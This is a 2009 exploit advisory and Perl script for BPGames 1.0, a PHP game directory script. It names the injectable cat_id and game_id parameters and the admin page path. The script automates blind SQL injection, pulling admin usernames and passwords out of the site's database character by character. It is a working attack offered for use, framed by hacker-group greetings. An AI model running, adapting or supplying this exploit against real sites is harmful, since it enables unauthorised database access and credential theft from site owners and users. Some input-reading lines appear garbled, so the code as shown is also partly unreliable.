#[x]===================================================================[x] # | AntiSecurity[dot]org | #[x]===================================================================[x] # | Title : BPGames 1.0 blind SQL Injection Exploit | # | Software : BPGames | # | Vendor : http://bpowerhouse.info | # | Date : 22 September 2009 ( Indonesia ) | # | Author : OoN_Boy | # | Contact : oon.boy9@gmail.com | # | Web : http://oonboy.info | # | Blog : http://oonboy.blogspot.com | #[x]===================================================================[x] # | Technology : PHP | # | Database : MySQL | # | Version : 1.0 | # | License : GNU GPL | # | Price : $29.90 | # | Description : is a game directory site script. The script | # | supports multi-language settings. Site users | # | can search for games according to categories | #[x]===================================================================[x] # | Google Dork : gwe ganteng :P | #[x]===================================================================[x] # | Exploit : http://localhost/[path]/main.php?cat_id=[sql] | # | http://localhost/[path]/game.php?game_id=[sql]| # | Aadmin Page : http://localhost/[path]/admin/index.php | #[x]===================================================================[x] # | Greetz : antisecurity.org batamhacker.or.id | # | Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y| # | yooogy mousekill }^-^{ martfella noname s4va | # | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua | # | Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny| #[x]===================================================================[x] use HTTP::Request; use LWP::UserAgent; $cmsapp = 'BPGames'; $vuln = 'main.php?cat_id='; #change vuln game.php?game_id= #vuln = 'game.php?game_id='; $string = 'Previous'; #change if any string #string = 'Instrucciones'; $maxlen = 32; my $OS = "$^O"; if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); } printf "\n $cmsapp [x]=================================================[x] | BPGames 1.0 blind SQL Injection Exploit | [x]=================================================[x] \n"; print " [+] URL Path : "; chomp($web=); print " [+] Valid ID : "; chomp($id=); print " [+] Table : "; chomp($table=); #table name admins print " [+] Columns : "; chomp($columns=); #column username and password if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; } print "\n\n [!] Exploiting $target ...\n\n"; &get_data; print "\n\n [!] Mission completed.\n\n"; sub get_data() { @columns = split(/,/, $columns); foreach $column (@columns) { print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n"; syswrite(STDOUT, " [-] $table\@$column> ", 255); for (my $i=1; $i<=$maxlen; $i++) { my $chr = 0; my $found = 0; my $char = 48; while (!$chr && $char<=57) { if(exploit($i,$char) =~ /$string/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } if(!$chr) { $char = 97; while(!$chr && $char<=122) { if(exploit($i,$char) =~ /$string/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } } if (!$found) { print "\n"; last; } } } } sub exploit() { my $limit = $_[0]; my $chars = $_[1]; my $blind = '+AND+SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1)=CHAR('.$chars.')'; my $inject = $target.$vuln.$id.$blind; my $content = get_content($inject); return $content; } sub get_content() { my $url = $_[0]; my $req = HTTP::Request->new(GET => $url); my $ua = LWP::UserAgent->new(); $ua->timeout(5); my $res = $ua->request($req); if ($res->is_error){ print "\n\n [!] Error, ".$res->status_line.".\n\n"; exit; } return $res->content; } # Exploit End